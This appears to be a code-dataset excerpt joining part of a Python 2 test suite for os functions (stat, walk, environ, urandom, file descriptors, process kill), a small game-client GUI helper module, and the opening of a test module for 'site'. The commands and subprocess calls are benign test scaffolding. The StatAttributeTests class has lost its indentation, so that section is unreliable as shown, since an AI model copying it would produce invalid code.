            self.check_tempfile(name)
    def test_tmpfile(self):
        if not hasattr(os, "tmpfile"):
            return
        # As with test_tmpnam() below, the Windows implementation of tmpfile()
        # attempts to create a file in the root directory of the current drive.
        # On Vista and Server 2008, this test will always fail for normal users
        # as writing to the root directory requires elevated privileges. With
        # XP and below, the semantics of tmpfile() are the same, but the user
        # running the test is more likely to have administrative privileges on
        # their account already. If that's the case, then os.tmpfile() should
        # work. In order to make this test as useful as possible, rather than
        # trying to detect Windows versions or whether or not the user has the
        # right permissions, just try and create a file in the root directory
        # and see if it raises a 'Permission denied' OSError. If it does, then
        # test that a subsequent call to os.tmpfile() raises the same error. If
        # it doesn't, assume we're on XP or below and the user running the test
        # has administrative privileges, and proceed with the test as normal.
        with warnings.catch_warnings():
            warnings.filterwarnings("ignore", "tmpfile", DeprecationWarning)
            if sys.platform == 'win32':
                name = '\\python_test_os_test_tmpfile.txt'
                if os.path.exists(name):
                    os.remove(name)
                try:
                    fp = open(name, 'w')
                except IOError, first:
                    # open() failed, assert tmpfile() fails in the same way.
                    # Although open() raises an IOError and os.tmpfile() raises an
                    # OSError(), 'args' will be (13, 'Permission denied') in both
                    # cases.
                    try:
                        fp = os.tmpfile()
                    except OSError, second:
                        self.assertEqual(first.args, second.args)
                    else:
                        self.fail("expected os.tmpfile() to raise OSError")
                    return
                else:
                    # open() worked, therefore, tmpfile() should work. Close our
                    # dummy file and proceed with the test as normal.
                    fp.close()
                    os.remove(name)
            fp = os.tmpfile()
            fp.write("foobar")
            fp.seek(0,0)
            s = fp.read()
            fp.close()
            self.assertTrue(s == "foobar")
    def test_tmpnam(self):
        if not hasattr(os, "tmpnam"):
            return
        with warnings.catch_warnings():
            warnings.filterwarnings("ignore", "tmpnam", RuntimeWarning,
                                    r"test_os$")
            warnings.filterwarnings("ignore", "tmpnam", DeprecationWarning)
            name = os.tmpnam()
            if sys.platform in ("win32",):
                # The Windows tmpnam() seems useless.  From the MS docs:
                #
                #     The character string that tmpnam creates consists of
                #     the path prefix, defined by the entry P_tmpdir in the
                #     file STDIO.H, followed by a sequence consisting of the
                #     digit characters '0' through '9'; the numerical value
                #     of this string is in the range 1 - 65,535.  Changing the
                #     definitions of L_tmpnam or P_tmpdir in STDIO.H does not
                #     change the operation of tmpnam.
                #
                # The really bizarre part is that, at least under MSVC6,
                # P_tmpdir is "\\".  That is, the path returned refers to
                # the root of the current drive.  That's a terrible place to
                # put temp files, and, depending on privileges, the user
                # may not even be able to open a file in the root directory.
                self.assertFalse(os.path.exists(name),
                            "file already exists for temporary file")
            else:
                self.check_tempfile(name)
# Test attributes on return values from os.*stat* family.
class StatAttributeTests(unittest.TestCase):
def setUp(self):
os.mkdir(test_support.TESTFN)
self.fname = os.path.join(test_support.TESTFN, "f1")
f = open(self.fname, 'wb')
f.write("ABC")
f.close()
def tearDown(self):
os.unlink(self.fname)
os.rmdir(test_support.TESTFN)
def test_stat_attributes(self):
if not hasattr(os, "stat"):
return
import stat
result = os.stat(self.fname)
# Make sure direct access works
self.assertEqual(result[stat.ST_SIZE], 3)
self.assertEqual(result.st_size, 3)
# Make sure all the attributes are there
members = dir(result)
for name in dir(stat):
if name[:3] == 'ST_':
attr = name.lower()
if name.endswith("TIME"):
def trunc(x): return int(x)
else:
def trunc(x): return x
self.assertEqual(trunc(getattr(result, attr)),
result[getattr(stat, name)])
self.assertIn(attr, members)
try:
result[200]
self.fail("No exception raised")
except IndexError:
pass
# Make sure that assignment fails
try:
result.st_mode = 1
self.fail("No exception raised")
except (AttributeError, TypeError):
pass
try:
result.st_rdev = 1
self.fail("No exception raised")
except (AttributeError, TypeError):
pass
try:
result.parrot = 1
self.fail("No exception raised")
except AttributeError:
pass
# Use the stat_result constructor with a too-short tuple.
try:
result2 = os.stat_result((10,))
self.fail("No exception raised")
except TypeError:
pass
# Use the constructor with a too-long tuple.
try:
result2 = os.stat_result((0,1,2,3,4,5,6,7,8,9,10,11,12,13,14))
except TypeError:
pass
def test_statvfs_attributes(self):
if not hasattr(os, "statvfs"):
return
try:
result = os.statvfs(self.fname)
except OSError, e:
# On AtheOS, glibc always returns ENOSYS
if e.errno == errno.ENOSYS:
return
# Make sure direct access works
self.assertEqual(result.f_bfree, result[3])
# Make sure all the attributes are there.
members = ('bsize', 'frsize', 'blocks', 'bfree', 'bavail', 'files',
'ffree', 'favail', 'flag', 'namemax')
for value, member in enumerate(members):
self.assertEqual(getattr(result, 'f_' + member), result[value])
# Make sure that assignment really fails
try:
result.f_bfree = 1
self.fail("No exception raised")
except TypeError:
pass
try:
result.parrot = 1
self.fail("No exception raised")
except AttributeError:
pass
# Use the constructor with a too-short tuple.
try:
result2 = os.statvfs_result((10,))
self.fail("No exception raised")
except TypeError:
pass
# Use the constructor with a too-long tuple.
try:
result2 = os.statvfs_result((0,1,2,3,4,5,6,7,8,9,10,11,12,13,14))
except TypeError:
pass
    def test_utime_dir(self):
        # Set the mtime of TESTFN far into the past and verify that a
        # subsequent stat() reports exactly the value we set.
        delta = 1000000
        st = os.stat(test_support.TESTFN)
        # round to int, because some systems may support sub-second
        # time stamps in stat, but not in utime.
        os.utime(test_support.TESTFN, (st.st_atime, int(st.st_mtime-delta)))
        st2 = os.stat(test_support.TESTFN)
        self.assertEqual(st2.st_mtime, int(st.st_mtime-delta))
    # Restrict test to Win32, since there is no guarantee other
    # systems support centiseconds
    if sys.platform == 'win32':
        def get_file_system(path):
            # Return the filesystem name (e.g. "NTFS") of the volume
            # containing *path*, or None if the Win32 call fails.
            root = os.path.splitdrive(os.path.abspath(path))[0] + '\\'
            import ctypes
            kernel32 = ctypes.windll.kernel32
            buf = ctypes.create_string_buffer("", 100)
            if kernel32.GetVolumeInformationA(root, None, 0, None, None, None, buf, len(buf)):
                return buf.value

        # Sub-second timestamp tests only make sense on NTFS volumes.
        if get_file_system(test_support.TESTFN) == "NTFS":
            def test_1565150(self):
                # Fractional mtimes must round-trip through utime/stat.
                t1 = 1159195039.25
                os.utime(self.fname, (t1, t1))
                self.assertEqual(os.stat(self.fname).st_mtime, t1)

            def test_large_time(self):
                t1 = 5000000000 # some day in 2128
                os.utime(self.fname, (t1, t1))
                self.assertEqual(os.stat(self.fname).st_mtime, t1)

        def test_1686475(self):
            # Verify that an open file can be stat'ed
            try:
                os.stat(r"c:\pagefile.sys")
            except WindowsError, e:
                if e.errno == 2: # file does not exist; cannot run test
                    return
                self.fail("Could not stat pagefile.sys")
from test import mapping_tests
class EnvironTests(mapping_tests.BasicTestMappingProtocol):
    """check that os.environ object conform to mapping protocol"""
    type2test = None

    def _reference(self):
        # Sample mapping used by the generic mapping-protocol tests.
        return {"KEY1":"VALUE1", "KEY2":"VALUE2", "KEY3":"VALUE3"}

    def _empty_mapping(self):
        os.environ.clear()
        return os.environ

    def setUp(self):
        # Snapshot the real environment so every test starts from empty.
        self.__save = dict(os.environ)
        os.environ.clear()

    def tearDown(self):
        os.environ.clear()
        os.environ.update(self.__save)

    # Bug 1110478
    def test_update2(self):
        # Changes via os.environ must be visible to child processes.
        if os.path.exists("/bin/sh"):
            os.environ.update(HELLO="World")
            with os.popen("/bin/sh -c 'echo $HELLO'") as popen:
                value = popen.read().strip()
                self.assertEqual(value, "World")

    # On FreeBSD < 7 and OS X < 10.6, unsetenv() doesn't return a value (issue
    # #13415).
    @unittest.skipIf(sys.platform.startswith(('freebsd', 'darwin')),
                     "due to known OS bug: see issue #13415")
    def test_unset_error(self):
        if sys.platform == "win32":
            # an environment variable is limited to 32,767 characters
            key = 'x' * 50000
            self.assertRaises(ValueError, os.environ.__delitem__, key)
        else:
            # "=" is not allowed in a variable name
            key = 'key='
            self.assertRaises(OSError, os.environ.__delitem__, key)
class WalkTests(unittest.TestCase):
    """Tests for os.walk()."""

    def test_traversal(self):
        import os
        from os.path import join

        # Build:
        #     TESTFN/
        #       TEST1/              a file kid and two directory kids
        #         tmp1
        #         SUB1/             a file kid and a directory kid
        #           tmp2
        #           SUB11/          no kids
        #         SUB2/             a file kid and a dirsymlink kid
        #           tmp3
        #           link/           a symlink to TESTFN.2
        #       TEST2/
        #         tmp4              a lone file
        walk_path = join(test_support.TESTFN, "TEST1")
        sub1_path = join(walk_path, "SUB1")
        sub11_path = join(sub1_path, "SUB11")
        sub2_path = join(walk_path, "SUB2")
        tmp1_path = join(walk_path, "tmp1")
        tmp2_path = join(sub1_path, "tmp2")
        tmp3_path = join(sub2_path, "tmp3")
        link_path = join(sub2_path, "link")
        t2_path = join(test_support.TESTFN, "TEST2")
        tmp4_path = join(test_support.TESTFN, "TEST2", "tmp4")

        # Create stuff.
        os.makedirs(sub11_path)
        os.makedirs(sub2_path)
        os.makedirs(t2_path)
        for path in tmp1_path, tmp2_path, tmp3_path, tmp4_path:
            f = file(path, "w")
            f.write("I'm " + path + " and proud of it. Blame test_os.\n")
            f.close()
        if hasattr(os, "symlink"):
            os.symlink(os.path.abspath(t2_path), link_path)
            sub2_tree = (sub2_path, ["link"], ["tmp3"])
        else:
            sub2_tree = (sub2_path, [], ["tmp3"])

        # Walk top-down.
        all = list(os.walk(walk_path))
        self.assertEqual(len(all), 4)
        # We can't know which order SUB1 and SUB2 will appear in.
        # Not flipped: TESTFN, SUB1, SUB11, SUB2
        # flipped: TESTFN, SUB2, SUB1, SUB11
        flipped = all[0][1][0] != "SUB1"
        all[0][1].sort()
        self.assertEqual(all[0], (walk_path, ["SUB1", "SUB2"], ["tmp1"]))
        self.assertEqual(all[1 + flipped], (sub1_path, ["SUB11"], ["tmp2"]))
        self.assertEqual(all[2 + flipped], (sub11_path, [], []))
        self.assertEqual(all[3 - 2 * flipped], sub2_tree)

        # Prune the search.
        all = []
        for root, dirs, files in os.walk(walk_path):
            all.append((root, dirs, files))
            # Don't descend into SUB1.
            if 'SUB1' in dirs:
                # Note that this also mutates the dirs we appended to all!
                dirs.remove('SUB1')
        self.assertEqual(len(all), 2)
        self.assertEqual(all[0], (walk_path, ["SUB2"], ["tmp1"]))
        self.assertEqual(all[1], sub2_tree)

        # Walk bottom-up.
        all = list(os.walk(walk_path, topdown=False))
        self.assertEqual(len(all), 4)
        # We can't know which order SUB1 and SUB2 will appear in.
        # Not flipped: SUB11, SUB1, SUB2, TESTFN
        # flipped: SUB2, SUB11, SUB1, TESTFN
        flipped = all[3][1][0] != "SUB1"
        all[3][1].sort()
        self.assertEqual(all[3], (walk_path, ["SUB1", "SUB2"], ["tmp1"]))
        self.assertEqual(all[flipped], (sub11_path, [], []))
        self.assertEqual(all[flipped + 1], (sub1_path, ["SUB11"], ["tmp2"]))
        self.assertEqual(all[2 - 2 * flipped], sub2_tree)

        if hasattr(os, "symlink"):
            # Walk, following symlinks.
            for root, dirs, files in os.walk(walk_path, followlinks=True):
                if root == link_path:
                    self.assertEqual(dirs, [])
                    self.assertEqual(files, ["tmp4"])
                    break
            else:
                self.fail("Didn't follow symlink with followlinks=True")

    def tearDown(self):
        # Tear everything down. This is a decent use for bottom-up on
        # Windows, which doesn't have a recursive delete command. The
        # (not so) subtlety is that rmdir will fail unless the dir's
        # kids are removed first, so bottom up is essential.
        for root, dirs, files in os.walk(test_support.TESTFN, topdown=False):
            for name in files:
                os.remove(os.path.join(root, name))
            for name in dirs:
                dirname = os.path.join(root, name)
                if not os.path.islink(dirname):
                    os.rmdir(dirname)
                else:
                    os.remove(dirname)
        os.rmdir(test_support.TESTFN)
class MakedirTests (unittest.TestCase):
    """Tests for os.makedirs()/os.removedirs()."""

    def setUp(self):
        os.mkdir(test_support.TESTFN)

    def test_makedir(self):
        base = test_support.TESTFN
        # Creating a fresh nested chain, then extending it, must both work.
        path = os.path.join(base, 'dir1', 'dir2', 'dir3')
        os.makedirs(path) # Should work
        path = os.path.join(base, 'dir1', 'dir2', 'dir3', 'dir4')
        os.makedirs(path)

        # Try paths with a '.' in them
        self.assertRaises(OSError, os.makedirs, os.curdir)
        path = os.path.join(base, 'dir1', 'dir2', 'dir3', 'dir4', 'dir5', os.curdir)
        os.makedirs(path)
        path = os.path.join(base, 'dir1', os.curdir, 'dir2', 'dir3', 'dir4',
                            'dir5', 'dir6')
        os.makedirs(path)

    def tearDown(self):
        path = os.path.join(test_support.TESTFN, 'dir1', 'dir2', 'dir3',
                            'dir4', 'dir5', 'dir6')
        # If the tests failed, the bottom-most directory ('../dir6')
        # may not have been created, so we look for the outermost directory
        # that exists.
        while not os.path.exists(path) and path != test_support.TESTFN:
            path = os.path.dirname(path)

        os.removedirs(path)
class DevNullTests (unittest.TestCase):
    """Tests for os.devnull."""

    def test_devnull(self):
        # Writes to the null device are discarded; reads hit EOF at once.
        f = file(os.devnull, 'w')
        f.write('hello')
        f.close()
        f = file(os.devnull, 'r')
        self.assertEqual(f.read(), '')
        f.close()
class URandomTests (unittest.TestCase):
    """Tests for os.urandom()."""

    def test_urandom_length(self):
        # os.urandom(n) must return exactly n bytes.
        self.assertEqual(len(os.urandom(0)), 0)
        self.assertEqual(len(os.urandom(1)), 1)
        self.assertEqual(len(os.urandom(10)), 10)
        self.assertEqual(len(os.urandom(100)), 100)
        self.assertEqual(len(os.urandom(1000)), 1000)

    def test_urandom_value(self):
        # Two successive reads should (overwhelmingly likely) differ.
        data1 = os.urandom(16)
        data2 = os.urandom(16)
        self.assertNotEqual(data1, data2)

    def get_urandom_subprocess(self, count):
        # Run os.urandom(count) in a child interpreter and return the bytes.
        # We need to use repr() and eval() to avoid line ending conversions
        # under Windows.
        code = '\n'.join((
            'import os, sys',
            'data = os.urandom(%s)' % count,
            'sys.stdout.write(repr(data))',
            'sys.stdout.flush()',
            'print >> sys.stderr, (len(data), data)'))
        cmd_line = [sys.executable, '-c', code]
        p = subprocess.Popen(cmd_line, stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        out, err = p.communicate()
        self.assertEqual(p.wait(), 0, (p.wait(), err))
        # Safe here: the child is our own trusted code emitting repr(bytes).
        out = eval(out)
        self.assertEqual(len(out), count, err)
        return out

    def test_urandom_subprocess(self):
        # Different processes must not produce the same random stream.
        data1 = self.get_urandom_subprocess(16)
        data2 = self.get_urandom_subprocess(16)
        self.assertNotEqual(data1, data2)

    def test_execvpe_with_bad_arglist(self):
        # An empty argv list must be rejected before any exec happens.
        self.assertRaises(ValueError, os.execvpe, 'notepad', [], None)
class Win32ErrorTests(unittest.TestCase):
    """Check that os functions raise WindowsError for a missing path.

    On non-Windows platforms this class is replaced by an empty stub
    further down in the module.
    """
    def test_rename(self):
        self.assertRaises(WindowsError, os.rename, test_support.TESTFN, test_support.TESTFN+".bak")

    def test_remove(self):
        self.assertRaises(WindowsError, os.remove, test_support.TESTFN)

    def test_chdir(self):
        self.assertRaises(WindowsError, os.chdir, test_support.TESTFN)

    def test_mkdir(self):
        # Creating TESTFN as a *file* first makes mkdir on the same name fail.
        f = open(test_support.TESTFN, "w")
        try:
            self.assertRaises(WindowsError, os.mkdir, test_support.TESTFN)
        finally:
            f.close()
            os.unlink(test_support.TESTFN)

    def test_utime(self):
        self.assertRaises(WindowsError, os.utime, test_support.TESTFN, None)

    def test_chmod(self):
        self.assertRaises(WindowsError, os.chmod, test_support.TESTFN, 0)
class TestInvalidFD(unittest.TestCase):
    """Check that fd-taking os functions raise EBADF for a bad descriptor."""
    # Functions taking a single fd argument; a test_<name> method is
    # generated for each one by the class-body loop below.
    singles = ["fchdir", "fdopen", "dup", "fdatasync", "fstat",
               "fstatvfs", "fsync", "tcgetpgrp", "ttyname"]
    #singles.append("close")
    #We omit close because it doesn'r raise an exception on some platforms
    def get_single(f):
        # Factory producing a test method for os.<f>, run only if it exists.
        def helper(self):
            if hasattr(os, f):
                self.check(getattr(os, f))
        return helper
    for f in singles:
        locals()["test_"+f] = get_single(f)

    def check(self, f, *args):
        # Assert that calling f on a known-invalid fd raises OSError/EBADF.
        try:
            f(test_support.make_bad_fd(), *args)
        except OSError as e:
            self.assertEqual(e.errno, errno.EBADF)
        else:
            self.fail("%r didn't raise a OSError with a bad file descriptor"
                      % f)

    def test_isatty(self):
        # isatty() reports False rather than raising on a bad fd.
        if hasattr(os, "isatty"):
            self.assertEqual(os.isatty(test_support.make_bad_fd()), False)

    def test_closerange(self):
        if hasattr(os, "closerange"):
            fd = test_support.make_bad_fd()
            # Make sure none of the descriptors we are about to close are
            # currently valid (issue 6542).
            for i in range(10):
                try: os.fstat(fd+i)
                except OSError:
                    pass
                else:
                    break
            if i < 2:
                raise unittest.SkipTest(
                    "Unable to acquire a range of invalid file descriptors")
            self.assertEqual(os.closerange(fd, fd + i-1), None)

    def test_dup2(self):
        if hasattr(os, "dup2"):
            self.check(os.dup2, 20)

    def test_fchmod(self):
        if hasattr(os, "fchmod"):
            self.check(os.fchmod, 0)

    def test_fchown(self):
        if hasattr(os, "fchown"):
            self.check(os.fchown, -1, -1)

    def test_fpathconf(self):
        if hasattr(os, "fpathconf"):
            self.check(os.fpathconf, "PC_NAME_MAX")

    def test_ftruncate(self):
        if hasattr(os, "ftruncate"):
            self.check(os.ftruncate, 0)

    def test_lseek(self):
        if hasattr(os, "lseek"):
            self.check(os.lseek, 0, 0)

    def test_read(self):
        if hasattr(os, "read"):
            self.check(os.read, 1)

    def test_tcsetpgrpt(self):
        if hasattr(os, "tcsetpgrp"):
            self.check(os.tcsetpgrp, 0)

    def test_write(self):
        if hasattr(os, "write"):
            self.check(os.write, " ")
# Platform dispatch: on POSIX, neuter the Windows-only error tests and
# define the real uid/gid tests; on Windows, neuter the uid/gid tests.
if sys.platform != 'win32':
    class Win32ErrorTests(unittest.TestCase):
        pass

    class PosixUidGidTests(unittest.TestCase):
        """Non-root processes must get os.error from set*uid/gid(0);
        values >= 2**32 must raise OverflowError."""
        if hasattr(os, 'setuid'):
            def test_setuid(self):
                if os.getuid() != 0:
                    self.assertRaises(os.error, os.setuid, 0)
                self.assertRaises(OverflowError, os.setuid, 1<<32)

        if hasattr(os, 'setgid'):
            def test_setgid(self):
                if os.getuid() != 0:
                    self.assertRaises(os.error, os.setgid, 0)
                self.assertRaises(OverflowError, os.setgid, 1<<32)

        if hasattr(os, 'seteuid'):
            def test_seteuid(self):
                if os.getuid() != 0:
                    self.assertRaises(os.error, os.seteuid, 0)
                self.assertRaises(OverflowError, os.seteuid, 1<<32)

        if hasattr(os, 'setegid'):
            def test_setegid(self):
                if os.getuid() != 0:
                    self.assertRaises(os.error, os.setegid, 0)
                self.assertRaises(OverflowError, os.setegid, 1<<32)

        if hasattr(os, 'setreuid'):
            def test_setreuid(self):
                if os.getuid() != 0:
                    self.assertRaises(os.error, os.setreuid, 0, 0)
                self.assertRaises(OverflowError, os.setreuid, 1<<32, 0)
                self.assertRaises(OverflowError, os.setreuid, 0, 1<<32)

            def test_setreuid_neg1(self):
                # Needs to accept -1. We run this in a subprocess to avoid
                # altering the test runner's process state (issue8045).
                subprocess.check_call([
                        sys.executable, '-c',
                        'import os,sys;os.setreuid(-1,-1);sys.exit(0)'])

        if hasattr(os, 'setregid'):
            def test_setregid(self):
                if os.getuid() != 0:
                    self.assertRaises(os.error, os.setregid, 0, 0)
                self.assertRaises(OverflowError, os.setregid, 1<<32, 0)
                self.assertRaises(OverflowError, os.setregid, 0, 1<<32)

            def test_setregid_neg1(self):
                # Needs to accept -1. We run this in a subprocess to avoid
                # altering the test runner's process state (issue8045).
                subprocess.check_call([
                        sys.executable, '-c',
                        'import os,sys;os.setregid(-1,-1);sys.exit(0)'])
else:
    class PosixUidGidTests(unittest.TestCase):
        pass
@unittest.skipUnless(sys.platform == "win32", "Win32 specific tests")
class Win32KillTests(unittest.TestCase):
    """Tests for os.kill() on Windows (exit codes and console events)."""

    def _kill(self, sig):
        # Start sys.executable as a subprocess and communicate from the
        # subprocess to the parent that the interpreter is ready. When it
        # becomes ready, send *sig* via os.kill to the subprocess and check
        # that the return code is equal to *sig*.
        import ctypes
        from ctypes import wintypes
        import msvcrt

        # Since we can't access the contents of the process' stdout until the
        # process has exited, use PeekNamedPipe to see what's inside stdout
        # without waiting. This is done so we can tell that the interpreter
        # is started and running at a point where it could handle a signal.
        PeekNamedPipe = ctypes.windll.kernel32.PeekNamedPipe
        PeekNamedPipe.restype = wintypes.BOOL
        PeekNamedPipe.argtypes = (wintypes.HANDLE, # Pipe handle
                                  ctypes.POINTER(ctypes.c_char), # stdout buf
                                  wintypes.DWORD, # Buffer size
                                  ctypes.POINTER(wintypes.DWORD), # bytes read
                                  ctypes.POINTER(wintypes.DWORD), # bytes avail
                                  ctypes.POINTER(wintypes.DWORD)) # bytes left
        msg = "running"
        proc = subprocess.Popen([sys.executable, "-c",
                                 "import sys;"
                                 "sys.stdout.write('{}');"
                                 "sys.stdout.flush();"
                                 "input()".format(msg)],
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE,
                                stdin=subprocess.PIPE)
        self.addCleanup(proc.stdout.close)
        self.addCleanup(proc.stderr.close)
        self.addCleanup(proc.stdin.close)

        # Poll (up to ~10s) until the child has written its ready message.
        count, max = 0, 100
        while count < max and proc.poll() is None:
            # Create a string buffer to store the result of stdout from the pipe
            buf = ctypes.create_string_buffer(len(msg))
            # Obtain the text currently in proc.stdout
            # Bytes read/avail/left are left as NULL and unused
            rslt = PeekNamedPipe(msvcrt.get_osfhandle(proc.stdout.fileno()),
                                 buf, ctypes.sizeof(buf), None, None, None)
            self.assertNotEqual(rslt, 0, "PeekNamedPipe failed")
            if buf.value:
                self.assertEqual(msg, buf.value)
                break
            time.sleep(0.1)
            count += 1
        else:
            self.fail("Did not receive communication from the subprocess")

        os.kill(proc.pid, sig)
        self.assertEqual(proc.wait(), sig)

    def test_kill_sigterm(self):
        # SIGTERM doesn't mean anything special, but make sure it works
        self._kill(signal.SIGTERM)

    def test_kill_int(self):
        # os.kill on Windows can take an int which gets set as the exit code
        self._kill(100)

    def _kill_with_event(self, event, name):
        # Handshake with the child via a shared mmap byte: '0' -> '1' means
        # the child's console control handler is installed.
        tagname = "test_os_%s" % uuid.uuid1()
        m = mmap.mmap(-1, 1, tagname)
        m[0] = '0'

        # Run a script which has console control handling enabled.
        proc = subprocess.Popen([sys.executable,
                   os.path.join(os.path.dirname(__file__),
                                "win_console_handler.py"), tagname],
                   creationflags=subprocess.CREATE_NEW_PROCESS_GROUP)

        # Let the interpreter startup before we send signals. See #3137.
        count, max = 0, 20
        while count < max and proc.poll() is None:
            if m[0] == '1':
                break
            time.sleep(0.5)
            count += 1
        else:
            self.fail("Subprocess didn't finish initialization")

        os.kill(proc.pid, event)
        # proc.send_signal(event) could also be done here.
        # Allow time for the signal to be passed and the process to exit.
        time.sleep(0.5)
        if not proc.poll():
            # Forcefully kill the process if we weren't able to signal it.
            os.kill(proc.pid, signal.SIGINT)
            self.fail("subprocess did not stop on {}".format(name))

    @unittest.skip("subprocesses aren't inheriting CTRL+C property")
    def test_CTRL_C_EVENT(self):
        from ctypes import wintypes
        import ctypes

        # Make a NULL value by creating a pointer with no argument.
        NULL = ctypes.POINTER(ctypes.c_int)()
        SetConsoleCtrlHandler = ctypes.windll.kernel32.SetConsoleCtrlHandler
        SetConsoleCtrlHandler.argtypes = (ctypes.POINTER(ctypes.c_int),
                                          wintypes.BOOL)
        SetConsoleCtrlHandler.restype = wintypes.BOOL

        # Calling this with NULL and FALSE causes the calling process to
        # handle CTRL+C, rather than ignore it. This property is inherited
        # by subprocesses.
        SetConsoleCtrlHandler(NULL, 0)

        self._kill_with_event(signal.CTRL_C_EVENT, "CTRL_C_EVENT")

    def test_CTRL_BREAK_EVENT(self):
        self._kill_with_event(signal.CTRL_BREAK_EVENT, "CTRL_BREAK_EVENT")
def test_main():
    # Entry point for regrtest: run every test class in this module.
    test_support.run_unittest(
        FileTests,
        TemporaryFileTests,
        StatAttributeTests,
        EnvironTests,
        WalkTests,
        MakedirTests,
        DevNullTests,
        URandomTests,
        Win32ErrorTests,
        TestInvalidFD,
        PosixUidGidTests,
        Win32KillTests
    )

if __name__ == "__main__":
    test_main()
| gpl-3.0 |
beast-arena/beast-arena | clientGui/ClientGuiLogic.py | 2 | 3312 | import datetime, time
"""
module for logical calculation stuff needed by gui implementations
"""
def parseStartTime(startTime):
    """Convert *startTime* into a datetime on today's date.

    Two input forms are accepted:
      * a number (or numeric string) of seconds relative to now, or
      * a string as generated by time.asctime()/time.ctime()
        (format: %a %b %d %H:%M:%S %Y).

    @param startTime: seconds offset or asctime-style time string
    @return: datetime.datetime with the current month and day, or None
             if the value cannot be parsed
    """
    now = datetime.datetime.now()
    # First interpretation: a relative offset in seconds from "now".
    try:
        seconds = float(startTime)
        timeString = time.ctime(time.time() + seconds)
        # ctime() yields e.g. 'Mon Jun 20 23:21:05 1993'; slice off the
        # weekday/month/day prefix, keeping 'HH:MM:SS YYYY'.
        return datetime.datetime.strptime(
            timeString[11:], '%H:%M:%S %Y').replace(month=now.month, day=now.day)
    except (TypeError, ValueError, OverflowError, OSError):
        # Not a numeric offset (or out of time.ctime range); fall through.
        pass
    # Second interpretation: an asctime()-style absolute time string.
    try:
        return datetime.datetime.strptime(
            str(startTime)[11:], '%H:%M:%S %Y').replace(month=now.month, day=now.day)
    except (TypeError, ValueError):
        # Unparseable input: preserve the historical None return.
        return None
def readServersFromFile(comboBox, serverMap):
    """Load saved server addresses into *comboBox* and *serverMap*.

    Each line of serverAddresses.txt has the form
    ``host:port:certificatePath``.  For every well-formed line the
    "host:port" string is inserted into *comboBox* and mapped in
    *serverMap* to the tuple (host, port, certificatePath).
    A missing or unreadable file is silently ignored (best effort),
    matching the previous behaviour.

    @param comboBox: combo box to insert an item containing the servers host and port
    @param serverMap: map to insert an value containing the servers address, port and path of certificate
    """
    try:
        # 'with' guarantees the file is closed even if reading fails.
        with open('../clientGui/resources/serverAddresses.txt', 'r') as serverFile:
            servers = serverFile.readlines()
    except (IOError, OSError):
        # No saved servers yet -- nothing to populate.
        return
    for i, line in enumerate(servers):
        split = line.rstrip().split(':', 3)
        if len(split) == 3:
            hostPort = split[0] + ':' + split[1]
            comboBox.insertItem(i, hostPort)
            serverMap[hostPort] = (split[0], split[1], split[2])
def appendServerToFile(server):
    """Append *server* to the server-address file if not already present.

    The existing file is read first (a missing file counts as empty) so
    that duplicate entries are not written twice.

    @param server: server address line to persist (written via str())
    """
    try:
        with open('../clientGui/resources/serverAddresses.txt', 'r') as serverFile:
            servers = serverFile.readlines()
    except (IOError, OSError):
        # First run: no file yet, treat as an empty list of entries.
        servers = []
    # Append mode keeps all previously stored entries intact; the file is
    # opened unconditionally (as before) so it is created when missing.
    with open('../clientGui/resources/serverAddresses.txt', 'a') as serversWrite:
        if server not in servers:
            serversWrite.write(str(server))
def updateWaitingProgressBar(bar):
    """Advance a "bouncing" progress bar by one step.

    While the bar's status tip is 'forward' it counts up towards 100;
    afterwards it counts back down with inverted appearance, and the
    direction flips to 'forward' again once it reaches 0.

    @param bar: progress bar which value should be changed
    """
    current = bar.value()
    movingForward = current < 100 and str(bar.statusTip()) == 'forward'
    if movingForward:
        bar.setInvertedAppearance(False)
        current += 1
    else:
        bar.setInvertedAppearance(True)
        bar.setStatusTip('backward')
        current -= 1
        if current == 0:
            # Bottom reached: bounce back up on the next call.
            bar.setStatusTip('forward')
    bar.setValue(current)
def updateProgressBar(bar, countdownBarStartTime, gameStartTime):
    """Set *bar* to the percentage of the countdown that has elapsed.

    @param bar: progress bar whose value is updated
    @param countdownBarStartTime: datetime when the countdown started
    @param gameStartTime: datetime when the game is due to start
    """
    total = timedeltaToTotalSeconds(gameStartTime - countdownBarStartTime)
    remaining = timedeltaToTotalSeconds(gameStartTime - datetime.datetime.now())
    elapsed = total - remaining
    bar.setValue(elapsed / total * 100)
def timedeltaToTotalSeconds(td):
    """Return *td* expressed as a (possibly fractional) float of seconds.

    Delegates to the standard datetime.timedelta.total_seconds()
    (available since Python 2.7), which computes exactly the same value
    as the previous hand-rolled microsecond arithmetic.

    @param td: a datetime.timedelta instance
    """
    return td.total_seconds()
if __name__=='__main__':
    # Ad-hoc manual smoke test: parse an offset of 12 seconds from now.
    parseStartTime(12)
| gpl-3.0 |
adaussy/eclipse-monkey-revival | plugins/python/org.eclipse.eclipsemonkey.lang.python/Lib/test/test_site.py | 2 | 15760 | """Tests for 'site'.
Tests assume the initial paths in sys.path once the interpreter has begun
executing have not been removed.
"""
import unittest
from test.test_support import run_unittest, TESTFN, EnvironmentVarGuard
from test.test_support import captured_output, is_jython
import __builtin__
import os
import sys
import re
import encodings
import subprocess
import sysconfig
from copy import copy
# Need to make sure to not import 'site' if someone specified ``-S`` at the
# command-line. Detect this by just making sure 'site' has not been imported
# already.
if "site" in sys.modules:
import site
else:
raise unittest.SkipTest("importation of site.py suppressed")
if site.ENABLE_USER_SITE and not os.path.isdir(site.USER_SITE):
# need to add user site directory for tests
os.makedirs(site.USER_SITE)
site.addsitedir(site.USER_SITE)
class HelperFunctionsTests(unittest.TestCase):
    """Tests for helper functions.

    The setting of the encoding (set using sys.setdefaultencoding) used by
    the Unicode implementation is not tested.
    """

    def setUp(self):
        """Save a copy of sys.path"""
        self.sys_path = sys.path[:]
        self.old_base = site.USER_BASE
        self.old_site = site.USER_SITE
        self.old_prefixes = site.PREFIXES
        self.old_vars = copy(sysconfig._CONFIG_VARS)

    def tearDown(self):
        """Restore sys.path"""
        sys.path[:] = self.sys_path
        site.USER_BASE = self.old_base
        site.USER_SITE = self.old_site
        site.PREFIXES = self.old_prefixes
        sysconfig._CONFIG_VARS = self.old_vars

    def test_makepath(self):
        # Test makepath() have an absolute path for its first return value
        # and a case-normalized version of the absolute path for its
        # second value.
        path_parts = ("Beginning", "End")
        original_dir = os.path.join(*path_parts)
        abs_dir, norm_dir = site.makepath(*path_parts)
        self.assertEqual(os.path.abspath(original_dir), abs_dir)
